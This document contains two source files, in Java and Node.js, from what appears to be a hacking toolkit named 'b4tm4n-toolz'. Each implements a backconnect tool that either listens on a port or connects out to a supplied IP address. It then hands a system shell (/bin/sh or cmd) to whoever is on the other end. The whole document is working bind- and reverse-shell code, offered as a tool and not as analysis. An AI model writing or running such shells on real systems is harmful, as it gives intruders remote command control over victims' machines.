File: b4tm4n-toolz/backconnect/back.java
import java.io.*;
import java.net.*;

public class b4tm4n_rs{
	private static final class pt extends Thread{
		private InputStream is;
		private OutputStream out;

		public pt(InputStream is, OutputStream out){this.is=is;this.out=out;}

		@Override
		public void run(){
			try{
				byte[] b = new byte[8192];
				int c = is.read(b);
				while(c>=0) {
					out.write(b,0,c);
					out.flush();
					c = is.read(b);
				}
			}
			catch(Exception e){e.printStackTrace();}
		}
	}

	public static void main(String[] args){
		int port;
		String cmd = "/bin/sh";
		if(System.getProperty("os.name").toLowerCase().indexOf("win")>=0){cmd = "cmd";}
		String w = "b4tm4n shell : connected\n";
		byte[] b = w.getBytes();
		Socket h = new Socket();
		try{
			if(args.length==1){
				port = Integer.parseInt(args[0]);
				ServerSocket s = new ServerSocket(port);
				h = s.accept();
			}
			else if(args.length==2){
				port = Integer.parseInt(args[0]);
				String ip = args[1];
				h = new Socket(ip, port);
			}
			if(args.length==1 || args.length==2){
				InputStream gis = h.getInputStream();
				OutputStream gos = h.getOutputStream();
				gos.write(b);
				Process p = Runtime.getRuntime().exec(cmd);

				pt p1 = new pt(p.getInputStream(), gos);
				pt p2 = new pt(gis, p.getOutputStream());
				p1.start();p2.start();
			}
		}
		catch(Exception e){e.printStackTrace();}
	}
}

File: b4tm4n-toolz/backconnect/back.js
var spawn = require('child_process').spawn;
var net = require('net');
var stream = require('stream');
var console = require('console');

var shell = '/bin/sh';
if(process.platform.match(/^win/i)) shell = 'cmd.exe';

var argv = process.argv;
if(argv.length==3){
	var h = net.createServer(function(s){
		s.write("b4tm4n shell : connected\n");
        var sh = spawn(shell);
        sh.stdin.resume()
        sh.stdout.on("data",function (data){s.write(data);});
        sh.stderr.on("data",function (data){s.write(data);});
        s.on("data",function (data){sh.stdin.write(data);});
	});
	h.listen(argv[2]);
}
else if(argv.length==4){
	var s = net.createConnection(argv[2], argv[3]);
	s.write("b4tm4n shell : connected\n");
	var sh = spawn(shell);
	sh.stdin.resume()
	sh.stdout.on("data",function (data){s.write(data);});
	sh.stderr.on("data",function (data){s.write(data);});
	s.on("data",function (data){sh.stdin.write(data);});
}